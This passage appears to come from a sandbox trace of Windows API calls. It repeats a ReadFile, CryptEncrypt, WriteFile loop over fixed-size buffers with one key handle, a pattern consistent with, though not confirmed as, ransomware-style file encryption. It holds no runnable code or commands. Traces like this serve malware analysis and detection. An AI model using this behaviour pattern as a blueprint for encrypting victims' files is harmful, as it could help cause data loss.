[0266.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.808] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.808] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.808] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.809] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.809] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.809] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.809] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.809] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.810] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.810] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.810] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.810] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.810] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.810] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.811] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.811] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.811] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.811] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.811] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.812] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.812] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.812] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.812] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.831] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.831] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.832] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.832] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.832] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.832] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.832] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.833] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.833] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.833] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.833] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.834] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.834] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.834] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.834] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.834] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.834] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.835] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.835] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.835] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, 